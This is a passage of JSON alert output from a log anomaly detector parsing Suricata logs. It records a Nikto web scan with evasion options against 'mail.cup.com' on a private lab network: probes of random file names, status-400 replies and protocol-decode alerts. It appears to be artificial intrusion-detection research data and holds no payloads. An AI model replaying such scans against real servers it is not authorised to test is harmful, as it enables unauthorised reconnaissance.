"/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.org\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.org\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.org", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.org", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46794,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46794, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1759467696471457,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1759467696471457, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.180404+0000\",\"flow_id\":1759467696471457,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46794,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.org\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.org\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.18 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.181939 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46796 -> 192.168.10.154:80", "/parser/model/time": 1583349514.181939, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46796, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.181939 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46796 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.18 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.dpgs", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.182096+0000\",\"flow_id\":1904689130685302,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46796,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.dpgs\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.dpgs\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.182096, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1904689130685302,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46796,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.dpgs\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.dpgs\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46796,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.dpgs\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.dpgs\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.dpgs\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.dpgs\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.dpgs", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.dpgs", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46796,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46796, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1904689130685302,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1904689130685302, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.182096+0000\",\"flow_id\":1904689130685302,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46796,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.dpgs\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.dpgs\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.18 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.183734 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46798 -> 192.168.10.154:80", "/parser/model/time": 1583349514.183734, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46798, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.183734 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46798 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.18 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.showsource", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.184027+0000\",\"flow_id\":2212887393913480,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46798,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.showsource\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.showsource\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.184027, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":2212887393913480,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46798,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.showsource\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.showsource\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46798,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.showsource\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.showsource\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.showsource\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.showsource\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.showsource", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.showsource", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46798,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46798, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":2212887393913480,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 2212887393913480, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.184027+0000\",\"flow_id\":2212887393913480,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46798,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.showsource\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.showsource\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.18 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.186320 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46800 -> 192.168.10.154:80", "/parser/model/time": 1583349514.18632, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46800, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.186320 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46800 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.19 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.cfg", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.186581+0000\",\"flow_id\":1239879732876050,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46800,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.cfg\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.cfg\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.186581, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1239879732876050,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": 